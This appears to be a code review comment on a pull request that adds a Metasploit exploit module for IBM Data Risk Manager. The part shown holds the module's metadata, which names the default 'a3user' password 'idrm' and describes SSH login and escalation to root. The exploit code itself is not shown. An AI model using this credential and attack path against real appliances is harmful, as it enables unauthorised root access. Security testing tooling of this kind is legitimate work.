modules/exploits/linux/ssh/ibm_drm_a3user.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Data Risk Manager default a3user password',
+        'Description' => %q{
+          This module abuses a known default password on IBM Data Risk Manager. The 'a3user'
+          has the default password 'idrm', and allows an attacker to login to the virtual appliance
+          via SSH. This can be escalate to a full root access, as 'a3user' has sudo access with the default password.
+          At the time of disclosure, this is a 0 day. Versions <= 2.0.3 are confirmed to be
+          affected, and the latest 2.0.6 is most likely affected too.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+            [ 'CVE', '2020-4429' ],   # insecure default password
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
+          },
+        'Payload' =>
+          {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' =>
+          [
+            [ 'IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)', {} ]
+          ],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 21 2020'
```

Comment:
```suggestion
        'DisclosureDate' => '2020-04-21'
```

I'd also move this after `References`.